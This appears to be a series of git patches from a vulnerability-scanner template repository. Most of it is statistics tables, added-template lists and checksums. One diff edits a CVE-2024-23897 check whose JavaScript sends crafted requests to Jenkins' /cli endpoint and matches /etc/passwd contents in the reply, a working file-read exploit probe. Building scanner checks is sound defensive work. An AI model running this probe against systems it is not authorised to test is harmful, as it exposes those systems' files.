qualtrics | 1 | | | | | | | | | +| balada | 1 | | | | | | | | | +| domphp | 1 | | | | | | | | | +| wp_attachment_export_project | 1 | | | | | | | | | +| cybernetikz | 1 | | | | | | | | | +| genie | 1 | | | | | | | | | +| cerber | 1 | | | | | | | | | +| yoast | 1 | | | | | | | | | +| atutor | 1 | | | | | | | | | +| oneinstack | 1 | | | | | | | | | +| posthog | 1 | | | | | | | | | +| dasan | 1 | | | | | | | | | +| ras | 1 | | | | | | | | | +| nitecrew-mastodon-instance | 1 | | | | | | | | | +| bonobo | 1 | | | | | | | | | +| championat | 1 | | | | | | | | | +| webp | 1 | | | | | | | | | +| tidepool | 1 | | | | | | | | | +| locust | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| patton | 1 | | | | | | | | | +| cachet | 1 | | | | | | | | | +| lotus_core_cms_project | 1 | | | | | | | | | +| manyvids | 1 | | | | | | | | | +| sh | 1 | | | | | | | | | +| 360 | 1 | | | | | | | | | +| phplist | 1 | | | | | | | | | +| pluginops | 1 | | | | | | | | | +| digital-ocean | 1 | | | | | | | | | +| bentbox | 1 | | | | | | | | | +| untrusted | 1 | | | | | | | | | +| usa-life | 1 | | | | | | | | | +| teamwork | 1 | | | | | | | | | +| alb | 1 | | | | | | | | | +| scrapingant | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| hestia | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| gira | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| gecad | 1 | | | | | | | | | +| feiyuxing | 1 | | | | | | | | | +| joomlamart | 1 | | | | | | | | | +| twitcasting | 1 | | | | | | | | | +| uservoice | 1 | | | | | | | | | +| adultism | 1 | | | | | | | | | +| projector | 1 | | | | | | | | | +| monitorix | 1 | | | | | | | | | +| inaturalist | 1 | | | | | | | | | +| omlet | 1 | | | | | | | | | +| searchblox | 1 | | | | | | | | | +| analytify | 1 | | | | | | | | | +| serverstatus | 1 | | | | | | | | | +| htmlcoderhelper | 1 | | | | | | | | | +| forticlient | 1 | | | | | | | | | +| reqlogic | 1 | | | | | | | | | +| nirweb-support | 1 | | | | | | | | | +| genieaccess | 1 | | | | | | | | | +| rpcms | 1 | | | | | | | | | +| opache | 1 | | | | | | | | | +| netman | 1 | | | | | | | | | +| ecosys | 1 | | | | | | | | | +| mspcontrol | 1 | | | | | | | | | +| redgifs | 1 | | | | | | | | | +| tbk | 1 | | | | | | | | | +| system | 1 | | | | | | | | | +| basixonline | 1 | | | | | | | | | +| navigate | 1 | | | | | | | | | +| streetview | 1 | | | | | | | | | +| kodbox | 1 | | | | | | | | | +| openmetadata | 1 | | | | | | | | | +| user-meta | 1 | | | | | | | | | +| aaha-chat | 1 | | | | | | | | | +| select-all-categories | 1 | | | | | | | | | +| compalex | 1 | | | | | | | | | +| coremail | 1 | | | | | | | | | +| pinkbike | 1 | | | | | | | | | +| corejoomla | 1 | | | | | | | | | +| aims | 1 | | | | | | | | | +| ppfeufer | 1 | | | | | | | | | +| mara | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| emulator | 1 | | | | | | | | | +| vlc-media | 1 | | | | | | | | | +| uberflip | 1 | | | | | | | | | +| crunchrat | 1 | | | | | | | | | +| pm43 | 1 | | | | | | | | | +| eventtickets | 1 | | | | | | | | | +| limit_login_attempts_project | 1 | | | | | | | | | +| instatus | 1 | | | | | | | | | +| inglorion | 1 | | | | | | | | | +| americanthinker | 1 | | | | | | | | | +| cookex | 1 | | | | | | | | | +| openid | 1 | | | | | | | | | +| codeermeneer | 1 | | | | | | | | | +| BankOfAmerica | 1 | | | | | | | | | +| visionhub | 1 | | | | | | | | | +| domino | 1 | | | | | | | | | +| xing | 1 | | | | | | | | | +| craftmypdf | 1 | | | | | | | | | +| ultimatemember | 1 | | | | | | | | | +| wowcms | 1 | | | | | | | | | +| teradici | 1 | | | | | | | | | +| colourlovers | 1 | | | | | | | | | +| owly | 1 | | | | | | | | | +| employee_records_system_project | 1 | | | | | | | | | +| jvm | 1 | | | | | | | | | +| e2pdf | 1 | | | | | | | | | +| geosolutionsgroup | 1 | | | | | | | | | +| interlib | 1 | | | | | | | | | +| time | 1 | | | | | | | | | +| screenshotapi | 1 | | | | | | | | | +| goodjob | 1 | | | | | | | | | +| regify | 1 | | | | | | | | | +| fark | 1 | | | | | | | | | +| smtp2go | 1 | | | | | | | | | +| joomlatag | 1 | | | | | | | | | +| orangehrm | 1 | | | | | | | | | +| fastvue | 1 | | | | | | | | | +| codementor | 1 | | | | | | | | | +| freehtmldesigns | 1 | | | | | | | | | +| fujitsu | 1 | | | | | | | | | +| coder | 1 | | | | | | | | | +| deliveroo | 1 | | | | | | | | | +| cory_lamle | 1 | | | | | | | | | +| fodors-forum | 1 | | | | | | | | | +| idangero | 1 | | | | | | | | | +| ocean-extra | 1 | | | | | | | | | +| taringa | 1 | | | | | | | | | +| bravenewcoin | 1 | | | | | | | | | +| ipvpn | 1 | | | | | | | | | +| the-plus-addons-for-elementor | 1 | | | | | | | | | +| workspace | 1 | | | | | | | | | +| ait-csv | 1 | | | | | | | | | +| travis | 1 | | | | | | | | | +| kms | 1 | | | | | | | | | +| wpaffiliatemanager | 1 | | | | | | | | | +| csa | 1 | | | | | | | | | +| beardev | 1 | | | | | | | | | +| wowhead | 1 | | | | | | | | | +| softr | 1 | | | | | | | | | +| zentral | 1 | | | | | | | | | +| exposures | 1 | | | | | | | | | +| mastodon-mastodon | 1 | | | | | | | | | +| sunhillo | 1 | | | | | | | | | +| rainbow_portal | 1 | | | | | | | | | +| cubebackup | 1 | | | | | | | | | +| statamic | 1 | | | | | | | | | +| trading212 | 1 | | | | | | | | | +| browserless | 1 | | | | | | | | | +| phpsysinfo | 1 | | | | | | | | | +| info-key | 1 | | | | | | | | | +| argocd | 1 | | | | | | | | | +| gstorage | 1 | | | | | | | | | +| spreadsheet-reader | 1 | | | | | | | | | +| ltrace | 1 | | | | | | | | | +| jspx | 1 | | | | | | | | | +| ericssonlg | 1 | | | | | | | | | +| wms | 1 | | | | | | | | | +| awin | 1 | | | | | | | | | +| kraken | 1 | | | | | | | | | +| mingyu | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| extensive-vc-addon | 1 | | | | | | | | | +| opentext | 1 | | | | | | | | | +| ztp | 1 | | | | | | | | | +| motioneye | 1 | | | | | | | | | +| syncthru | 1 | | | | | | | | | +| routeros | 1 | | | | | | | | | +| infinitewp | 1 | | | | | | | | | +| contact-form | 1 | | | | | | | | | +| v2924 | 1 | | | | | | | | | +| admin_word_count_column_project | 1 | | | | | | | | | +| pikabu | 1 | | | | | | | | | +| api_bearer_auth_project | 1 | | | | | | | | | +| attributewizardpro | 1 | | | | | | | | | +| ifeelweb | 1 | | | | | | | | | +| ubisoft | 1 | | | | | | | | | +| vfs | 1 | | | | | | | | | +| online_security_guards_hiring_system_project | 1 | | | | | | | | | +| tmate | 1 | | | | | | | | | +| ambassador | 1 | | | | | | | | | +| bacnet | 1 | | | | | | | | | +| odude | 1 | | | | | | | | | +| camtron | 1 | | | | | | | | | +| cloudstack | 1 | | | | | | | | | +| istat | 1 | | | | | | | | | +| checkmarx | 1 | | | | | | | | | +| director | 1 | | | | | | | | | +| sock | 1 | | | | | | | | | +| openethereum | 1 | | | | | | | | | +| oneidentity | 1 | | | | | | | | | +| ftp-backdoor | 1 | | | | | | | | | +| facade | 1 | | | | | | | | | +| rsb | 1 | | | | | | | | | +| snapdrop | 1 | | | | | | | | | +| oglaszamy24hpl | 1 | | | | | | | | | +| sco | 1 | | | | | | | | | +| extremenetworks | 1 | | | | | | | | | +| free5gc | 1 | | | | | | | | | +| redlion | 1 | | | | | | | | | +| mrtg | 1 | | | | | | | | | +| czepol | 1 | | | | | | | | | +| vmstio-mastodon-instance | 1 | | | | | | | | | +| apdisk | 1 | | | | | | | | | +| mdb | 1 | | | | | | | | | +| deeplink | 1 | | | | | | | | | +| affiliates-manager | 1 | | | | | | | | | +| titannit | 1 | | | | | | | | | +| smart-s45f | 1 | | | | | | | | | +| turbo | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| twig | 1 | | | | | | | | | +| ruijienetworks | 1 | | | | | | | | | +| openedx | 1 | | | | | | | | | +| tutor | 1 | | | | | | | | | +| webp_converter_for_media_project | 1 | | | | | | | | | +| caton | 1 | | | | | | | | | +| frontend_uploader_project | 1 | | | | | | | | | +| nzbget | 1 | | | | | | | | | +| prexview | 1 | | | | | | | | | +| onelogin | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| supremainc | 1 | | | | | | | | | +| argo-cd | 1 | | | | | | | | | +| multilaser | 1 | | | | | | | | | +| disabledrocks-mastodon-instance | 1 | | | | | | | | | +| celebrus | 1 | | | | | | | | | +| pyproject | 1 | | | | | | | | | +| jeecg-boot | 1 | | | | | | | | | +| udraw | 1 | | | | | | | | | +| patriots-win | 1 | | | | | | | | | +| trendmicro | 1 | | | | | | | | | +| wpdownloadmanager | 1 | | | | | | | | | +| wordpress-support | 1 | | | | | | | | | +| slstudio | 1 | | | | | | | | | +| knowledgetree | 1 | | | | | | | | | +| tidio-gallery_project | 1 | | | | | | | | | +| cults3d | 1 | | | | | | | | | +| vampr | 1 | | | | | | | | | +| wpsolr | 1 | | | | | | | | | +| divido | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| ogc | 1 | | | | | | | | | +| editor | 1 | | | | | | | | | +| impala | 1 | | | | | | | | | +| nordpass | 1 | | | | | | | | | +| mapproxy | 1 | | | | | | | | | +| cloud-box | 1 | | | | | | | | | +| voice123 | 1 | | | | | | | | | +| jh_404_logger_project | 1 | | | | | | | | | +| angularjs | 1 | | | | | | | | | +| qualcomm | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| thetattooforum | 1 | | | | | | | | | +| emobile | 1 | | | | | | | | | +| theme-fusion | 1 | | | | | | | | | +| aj-report | 1 | | | | | | | | | +| imageshack | 1 | | | | | | | | | +| yopass | 1 | | | | | | | | | +| ticket-master | 1 | | | | | | | | | +| dateinasia | 1 | | | | | | | | | +| nytimes | 1 | | | | | | | | | +| image-optimizer-wd | 1 | | | | | | | | | +| membership_database_project | 1 | | | | | | | | | +| gogoritas | 1 | | | | | | | | | +| exagrid | 1 | | | | | | | | | +| crocus | 1 | | | | | | | | | +| mms.pipp | 1 | | | | | | | | | +| users-ultra | 1 | | | | | | | | | +| broker | 1 | | | | | | | | | +| yiiframework | 1 | | | | | | | | | +| qsan | 1 | | | | | | | | | +| sky | 1 | | | | | | | | | +| secgate | 1 | | | | | | | | | +| red-leaves | 1 | | | | | | | | | +| aiohttp | 1 | | | | | | | | | +| x-wrt | 1 | | | | | | | | | +| homeautomation | 1 | | | | | | | | | +| titanit | 1 | | | | | | | | | +| node-srv_project | 1 | | | | | | | | | +| kindeditor | 1 | | | | | | | | | +| filmweb | 1 | | | | | | | | | +| soap | 1 | | | | | | | | | +| leotheme | 1 | | | | | | | | | +| loganalyzer | 1 | | | | | | | | | +| remkon | 1 | | | | | | | | | +| alchemy | 1 | | | | | | | | | +| crevado | 1 | | | | | | | | | +| openmage | 1 | | | | | | | | | +| kazulah | 1 | | | | | | | | | +| reprise | 1 | | | | | | | | | +| membership-database | 1 | | | | | | | | | +| fullworksplugins | 1 | | | | | | | | | +| tapitag | 1 | | | | | | | | | +| deadbolt | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| apsystems | 1 | | | | | | | | | +| blackduck | 1 | | | | | | | | | +| easyvista | 1 | | | | | | | | | +| xvideos-models | 1 | | | | | | | | | +| snipeit | 1 | | | | | | | | | +| armember-membership | 1 | | | | | | | | | +| amt | 1 | | | | | | | | | +| kirona | 1 | | | | | | | | | +| inkbunny | 1 | | | | | | | | | +| smarterstats | 1 | | | | | | | | | +| wifi | 1 | | | | | | | | | +| ncast_project | 1 | | | | | | | | | +| acemanager | 1 | | | | | | | | | +| snare | 1 | | | | | | | | | +| dsr250 | 1 | | | | | | | | | +| imagely | 1 | | | | | | | | | +| cgit | 1 | | | | | | | | | +| drill | 1 | | | | | | | | | +| prose | 1 | | | | | | | | | +| hanwang | 1 | | | | | | | | | +| webcraftic | 1 | | | | | | | | | +| wpserveur | 1 | | | | | | | | | +| msmq | 1 | | | | | | | | | +| pretty_url_project | 1 | | | | | | | | | +| jasperreport | 1 | | | | | | | | | +| rudderstack | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | +| caldera | 1 | | | | | | | | | +| jaspersoft | 1 | | | | | | | | | +| opengear | 1 | | | | | | | | | +| mikejolley | 1 | | | | | | | | | +| unbit | 1 | | | | | | | | | +| pondol-formmail_project | 1 | | | | | | | | | +| wishlistr | 1 | | | | | | | | | +| siteguard | 1 | | | | | | | | | +| passbolt | 1 | | | | | | | | | +| vernemq | 1 | | | | | | | | | +| openx | 1 | | | | | | | | | +| belkin | 1 | | | | | | | | | +| realor | 1 | | | | | | | | | +| gozi | 1 | | | | | | | | | +| demotywatory | 1 | | | | | | | | | +| dapr | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| alltrails | 1 | | | | | | | | | +| heat-trackr_project | 1 | | | | | | | | | +| raygun | 1 | | | | | | | | | +| wftpserver | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| wego | 1 | | | | | | | | | +| erlang | 1 | | | | | | | | | +| dolphinscheduler | 1 | | | | | | | | | +| accellion | 1 | | | | | | | | | +| librarything | 1 | | | | | | | | | +| utipio | 1 | | | | | | | | | +| dxplanning | 1 | | | | | | | | | +| hmc | 1 | | | | | | | | | +| facturascripts | 1 | | | | | | | | | +| stormcloud | 1 | | | | | | | | | +| likebtn-like-button | 1 | | | | | | | | | +| on-prem | 1 | | | | | | | | | +| mastodon-mstdnio | 1 | | | | | | | | | +| interactsh | 1 | | | | | | | | | +| tagdiv | 1 | | | | | | | | | +| squidex | 1 | | | | | | | | | +| szmerinfo | 1 | | | | | | | | | +| twitter-archived-profile | 1 | | | | | | | | | +| twitter-archived-tweets | 1 | | | | | | | | | +| contentkeeper | 1 | | | | | | | | | +| pokec | 1 | | | | | | | | | +| glodon | 1 | | | | | | | | | +| klogserver | 1 | | | | | | | | | +| boostifythemes | 1 | | | | | | | | | +| crm-perks-forms | 1 | | | | | | | | | +| code-garage | 1 | | | | | | | | | +| wowjoomla | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 377b60e4d4..e71cf8421d 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------|-------|----------|-------|------|-------| -| cve | 2571 | dhiyaneshdk | 1351 | http | 7663 | info | 3789 | file | 402 | -| panel | 1167 | daffainfo | 864 | file | 402 | high | 1816 | dns | 25 | -| wordpress | 1002 | dwisiswant0 | 803 | workflows | 191 | medium | 1578 | | | -| exposure | 968 | pussycat0x | 439 | network | 135 | critical | 1071 | | | -| xss | 917 | ritikchaddha | 380 | cloud | 134 | low | 271 | | | -| wp-plugin | 872 | pikpikcu | 353 | code | 81 | unknown | 40 | | | -| osint | 804 | princechaddha | 303 | javascript | 61 | | | | | -| tech | 698 | pdteam | 297 | ssl | 29 | | | | | -| lfi | 678 | ricardomaia | 239 | dast | 25 | | | | | -| misconfig | 673 | geeknik | 231 | dns | 22 | | | | | +| cve | 2604 | dhiyaneshdk | 1360 | http | 7723 | info | 3802 | file | 402 | +| panel | 1173 | daffainfo | 864 | file | 402 | high | 1843 | dns | 25 | +| wordpress | 1008 | dwisiswant0 | 803 | workflows | 192 | medium | 1588 | | | +| exposure | 971 | pussycat0x | 447 | network | 137 | critical | 1083 | | | +| xss | 919 | ritikchaddha | 393 | cloud | 134 | low | 272 | | | +| wp-plugin | 878 | pikpikcu | 353 | code | 81 | unknown | 41 | | | +| osint | 805 | princechaddha | 303 | javascript | 61 | | | | | +| tech | 703 | pdteam | 297 | ssl | 29 | | | | | +| lfi | 685 | ricardomaia | 241 | dast | 25 | | | | | +| misconfig | 678 | geeknik | 231 | dns | 22 | | | | | From 79367cb95c91d459d262f032bccc235d55b7547b Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 26 Jul 2024 07:36:42 +0000 Subject: [PATCH 1671/1841] Auto README Update [Fri Jul 26 07:36:42 UTC 2024] :robot: --- README.md | 22 +++++++++++----------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/README.md b/README.md index 5670add9a3..1ff83de552 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------|-------|----------|-------|------|-------| -| cve | 2571 | dhiyaneshdk | 1351 | http | 7663 | info | 3789 | file | 402 | -| panel | 1167 | daffainfo | 864 | file | 402 | high | 1816 | dns | 25 | -| wordpress | 1002 | dwisiswant0 | 803 | workflows | 191 | medium | 1578 | | | -| exposure | 968 | pussycat0x | 439 | network | 135 | critical | 1071 | | | -| xss | 917 | ritikchaddha | 380 | cloud | 134 | low | 271 | | | -| wp-plugin | 872 | pikpikcu | 353 | code | 81 | unknown | 40 | | | -| osint | 804 | princechaddha | 303 | javascript | 61 | | | | | -| tech | 698 | pdteam | 297 | ssl | 29 | | | | | -| lfi | 678 | ricardomaia | 239 | dast | 25 | | | | | -| misconfig | 673 | geeknik | 231 | dns | 22 | | | | | +| cve | 2604 | dhiyaneshdk | 1360 | http | 7723 | info | 3802 | file | 402 | +| panel | 1173 | daffainfo | 864 | file | 402 | high | 1843 | dns | 25 | +| wordpress | 1008 | dwisiswant0 | 803 | workflows | 192 | medium | 1588 | | | +| exposure | 971 | pussycat0x | 447 | network | 137 | critical | 1083 | | | +| xss | 919 | ritikchaddha | 393 | cloud | 134 | low | 272 | | | +| wp-plugin | 878 | pikpikcu | 353 | code | 81 | unknown | 41 | | | +| osint | 805 | princechaddha | 303 | javascript | 61 | | | | | +| tech | 703 | pdteam | 297 | ssl | 29 | | | | | +| lfi | 685 | ricardomaia | 241 | dast | 25 | | | | | +| misconfig | 678 | geeknik | 231 | dns | 22 | | | | | -**663 directories, 9059 files**. +**671 directories, 9126 files**. </td> </tr> From 61e5b1b0eb0351c2d57f2f9af15caae24ed9d513 Mon Sep 17 00:00:00 2001 From: Tarun Koyalwar <tarun@projectdiscovery.io> Date: Fri, 26 Jul 2024 18:16:48 +0530 Subject: [PATCH 1672/1841] update template to use Port argument --- javascript/cves/2024/CVE-2024-23897.yaml | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/javascript/cves/2024/CVE-2024-23897.yaml b/javascript/cves/2024/CVE-2024-23897.yaml index 62f37481b9..d0ac9ceba7 100644 --- a/javascript/cves/2024/CVE-2024-23897.yaml +++ b/javascript/cves/2024/CVE-2024-23897.yaml @@ -39,16 +39,18 @@ javascript: isPortOpen(Host,Port); code: | let m = require('nuclei/net'); - let name=(Host.includes(':') ? Host : Host+":80"); + let address = Host+":"+Port; let conn,conn2; - try { conn = m.OpenTLS('tcp', name) } catch { conn= m.Open('tcp', name)} + try { conn = m.OpenTLS('tcp', address) } catch { conn= m.Open('tcp', address)} conn.Send('POST /cli?remoting=false HTTP/1.1\r\nHost:'+Host+'\r\nSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92\r\nSide: download\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n\r\n'); - try { conn2 = m.OpenTLS('tcp', name) } catch { conn2= m.Open('tcp', name)} + try { conn2 = m.OpenTLS('tcp', address) } catch { conn2= m.Open('tcp', address)} conn2.Send('POST /cli?remoting=false HTTP/1.1\r\nHost:'+Host+'\r\nContent-type: application/octet-stream\r\nSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92\r\nSide: upload\r\nConnection: keep-alive\r\nContent-Length: 163\r\n\r\n'+Body) resp = conn.RecvString(1000) args: Body: "{{payload}}" - Host: "{{Hostname}}" + Host: "{{Host}}" + Port: "80" # if port not specified, default to 80 + exclude-ports: "0" # override default skip list of 80,443,8080,8443 matchers: - type: dsl @@ -59,5 +61,4 @@ javascript: - type: regex group: 1 regex: - - '\b([a-z_][a-z0-9_-]{0,31})\:x\:' -# digest: 490a0046304402206177320674364c9d4ca08784b566ee26f51797e931f44e2344b29753e9eb7f4f02200b80670626fb457ae4142d6b191740d2c0e7d499b6a08f246a375ddd7abc4e86:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '\b([a-z_][a-z0-9_-]{0,31})\:x\:' \ No newline at end of file From 9b2c596aee8c39486767cb7fb563d415862bb012 Mon Sep 17 00:00:00 2001 From: Tarun Koyalwar <tarun@projectdiscovery.io> Date: Fri, 26 Jul 2024 18:19:40 +0530 Subject: [PATCH 1673/1841] use multiple ports --- javascript/cves/2024/CVE-2024-23897.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/cves/2024/CVE-2024-23897.yaml b/javascript/cves/2024/CVE-2024-23897.yaml index d0ac9ceba7..f8a3df2704 100644 --- a/javascript/cves/2024/CVE-2024-23897.yaml +++ b/javascript/cves/2024/CVE-2024-23897.yaml @@ -49,7 +49,7 @@ javascript: args: Body: "{{payload}}" Host: "{{Host}}" - Port: "80" # if port not specified, default to 80 + Port: 80,443 # if port not specified, defaults to both 80 and 443 exclude-ports: "0" # override default skip list of 80,443,8080,8443 matchers: From 96d68b73868db28a8a6a201d4b5e65238b14fe3b Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Fri, 26 Jul 2024 13:02:14 +0000 Subject: [PATCH 1674/1841] Auto Generated New Template Addition List [Fri Jul 26 13:02:14 UTC 2024] :robot: --- .new-additions | 68 +------------------------------------------------- 1 file changed, 1 insertion(+), 67 deletions(-) diff --git a/.new-additions b/.new-additions index 3c5a1d69ea..cf8da48fe7 100644 --- a/.new-additions +++ b/.new-additions @@ -1,67 +1 @@ -headless/2024/CVE-2024-38526.yaml -http/cnvd/2023/CNVD-2023-72138.yaml -http/cves/2022/CVE-2022-34267.yaml -http/cves/2022/CVE-2022-38322.yaml -http/cves/2022/CVE-2022-45269.yaml -http/cves/2023/CVE-2023-2309.yaml -http/cves/2023/CVE-2023-29204.yaml -http/cves/2023/CVE-2023-4220.yaml -http/cves/2023/CVE-2023-43662.yaml -http/cves/2023/CVE-2023-44012.yaml -http/cves/2023/CVE-2023-4450.yaml -http/cves/2023/CVE-2023-48728.yaml -http/cves/2024/CVE-2024-1512.yaml -http/cves/2024/CVE-2024-2330.yaml -http/cves/2024/CVE-2024-32238.yaml -http/cves/2024/CVE-2024-34257.yaml -http/cves/2024/CVE-2024-34351.yaml -http/cves/2024/CVE-2024-3742.yaml -http/cves/2024/CVE-2024-37843.yaml -http/cves/2024/CVE-2024-38289.yaml -http/cves/2024/CVE-2024-39250.yaml -http/cves/2024/CVE-2024-39914.yaml -http/cves/2024/CVE-2024-40348.yaml -http/cves/2024/CVE-2024-4257.yaml -http/cves/2024/CVE-2024-4295.yaml -http/cves/2024/CVE-2024-4879.yaml -http/cves/2024/CVE-2024-4885.yaml -http/cves/2024/CVE-2024-5217.yaml -http/cves/2024/CVE-2024-5315.yaml -http/cves/2024/CVE-2024-6289.yaml -http/cves/2024/CVE-2024-6587.yaml -http/cves/2024/CVE-2024-6646.yaml -http/default-logins/deluge/deluge-default-login.yaml -http/default-logins/gitblit/gitblit-default-login.yaml -http/default-logins/netflow/netflow-default-login.yaml -http/exposed-panels/adguard-panel.yaml -http/exposed-panels/falcosidekick-panel.yaml -http/exposed-panels/freshrss-panel.yaml -http/exposed-panels/gradle/gradle-develocity-panel.yaml -http/exposed-panels/hal-management-panel.yaml -http/exposed-panels/netflow-analyzer-panel.yaml -http/exposed-panels/tomcat/tomcat-exposed.yaml -http/exposures/configs/apache-ozone-conf.yaml -http/exposures/configs/snoop-servlet-exposure.yaml -http/exposures/files/adcs-certificate.yaml -http/misconfiguration/freshrss-unauth.yaml -http/misconfiguration/installer/adguard-installer.yaml -http/misconfiguration/installer/freshrss-installer.yaml -http/misconfiguration/mongod-exposure.yaml -http/misconfiguration/servicenow-title-injection.yaml -http/misconfiguration/sftpgo-admin-setup.yaml -http/misconfiguration/ssrpm-arbitrary-password-reset.yaml -http/technologies/apache/apache-gravitino-detect.yaml -http/technologies/apache/apache-ozone-detect.yaml -http/technologies/wordpress/plugins/fluent-smtp.yaml -http/technologies/wordpress/plugins/wp-crontrol.yaml -http/vulnerabilities/hikvision/hikvision-isecure-info-leak.yaml -http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml -http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml -http/vulnerabilities/other/jan-file-upload.yaml -http/vulnerabilities/other/lvs-download-lfi.yaml -http/vulnerabilities/other/ncast-lfi.yaml -http/vulnerabilities/other/wifisky7-rce.yaml -network/c2/7777botnet.yaml -network/cves/2024/CVE-2024-6746.yaml -vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml -workflows/nacos-workflow.yaml +http/osint/user-enumeration/substack.yaml From ef0a415aa78a124fd81d34eb2111cc5765d2432e Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 26 Jul 2024 13:02:25 +0000 Subject: [PATCH 1675/1841] Auto Generated Templates Checksum [Fri Jul 26 13:02:25 UTC 2024] :robot: --- templates-checksum.txt | 439 +++++++++++++++++++++-------------------- 1 file changed, 220 insertions(+), 219 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index e80de4d40d..e12f9b67ff 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2,11 +2,11 @@ CODE_OF_CONDUCT.md:5c581b341cecd31ea4a275098ec84be9951f1593 CONTRIBUTING.md:a280fa8badd8622a481e1bb7f492dd82ac05ea71 LICENSE.md:48790f08ca6757688e2f5f3f4b017a073b3e20df PULL_REQUEST_TEMPLATE.md:c8aba78d67442f639483a10fa74681dea94faeb7 -README.md:49276d7e139dd9802214cad0b9cb41f6fe6c9da5 +README.md:8fb672d947ae8f5cca6afdb23adf9c1a2bc63de8 README_KR.md:174470dbc5c69e81f83ff816655a52cc8c5d7f26 -TEMPLATES-STATS.json:41391c1eb4a099a83a3e69f746af2cea0724e077 -TEMPLATES-STATS.md:951e805f89f9349e5cc0471b1d99331b29a3ca0c -TOP-10.md:5a847073660f6446f71bc9189fd4ea94d68bc20a +TEMPLATES-STATS.json:d82fcd54d29434a7b0b0f30d5b68e84f217679bd +TEMPLATES-STATS.md:3bab59f5fe6be0ed5e30b20d477874d05270b75f +TOP-10.md:2781aa9254b6f219f952d9a7f0fe0c1e86b10d96 cloud/aws/acm/acm-cert-expired.yaml:5c2330bf9034cad5cde868b85128ba737f45c37f cloud/aws/acm/acm-cert-renewal-30days.yaml:ad88137bc1382a729e7b3f3a0172aab684af2743 cloud/aws/acm/acm-cert-renewal-45days.yaml:0cb9388dd736046c47748a973e9092c12ada2f79 @@ -247,7 +247,7 @@ dast/vulnerabilities/sqli/time-based-sqli.yaml:c0bf67162953a70d11c3915a49e2a19a4 dast/vulnerabilities/ssrf/blind-ssrf.yaml:062d570ba1c6f5d5a382875b296b337c14f07aee dast/vulnerabilities/ssrf/response-ssrf.yaml:104def6ff82e4dcfc88917f98403bea903e39d79 dast/vulnerabilities/ssti/reflection-ssti.yaml:cfefbcfec9ce4e1de812f0409c4a2461a4a7b851 -dast/vulnerabilities/xss/dom-xss.yaml:9124f677d44a4f4303afe65cd65b3de0bc2327bd +dast/vulnerabilities/xss/dom-xss.yaml:f7c2f899afabd6c30043ccf7c841e14c9e6865c4 dast/vulnerabilities/xss/reflected-xss.yaml:46717ee593fe9809385572b82e9b1a7265c3cf6f dast/vulnerabilities/xxe/generic-xxe.yaml:d803e0d74fa83905be163e717878cc00b647a58b dns/azure-takeover-detection.yaml:5295c90a6fa66f513eca7f6f30eee8745a41aa0a @@ -745,9 +745,9 @@ helpers/wordpress/plugins/all-in-one-wp-migration.txt:965640b9f3dffab46786b739a0 helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt:e935235d3647d6ff94e208a06b4173d6d3f01134 helpers/wordpress/plugins/amp.txt:c78453b22ddacc88b67ece8b294a6b5930f15836 helpers/wordpress/plugins/antispam-bee.txt:ce256ecfbb665c5366c1669a3e7c3a24c65a6fa2 -helpers/wordpress/plugins/astra-sites.txt:c2dd4309068e440533d1b8b76fb6680a1324df74 +helpers/wordpress/plugins/astra-sites.txt:21cc7309d1a344b06354e74cd981e8a7d697803c helpers/wordpress/plugins/astra-widgets.txt:b210421abec0f36f79921c4cf586c321fb96deda -helpers/wordpress/plugins/autoptimize.txt:1889abba77b26fc1827431e5d46978a5e89769e6 +helpers/wordpress/plugins/autoptimize.txt:0f766def7495524760bb6627fe20754b1b42201b helpers/wordpress/plugins/backwpup.txt:9301d028023f0b8d0d7bac4531bbd63703d358da helpers/wordpress/plugins/better-search-replace.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/better-wp-security.txt:3fe0b3c91b9dd2a6f57c0d1e7ec7c05ac3858661 @@ -767,7 +767,7 @@ helpers/wordpress/plugins/code-snippets.txt:bcfacf8cd6cd2afbf752b95fba64c2c67f0c helpers/wordpress/plugins/coming-soon.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/complianz-gdpr.txt:47c3ed69e5609d2452fff4d1fa775f2f0aaa7d4c 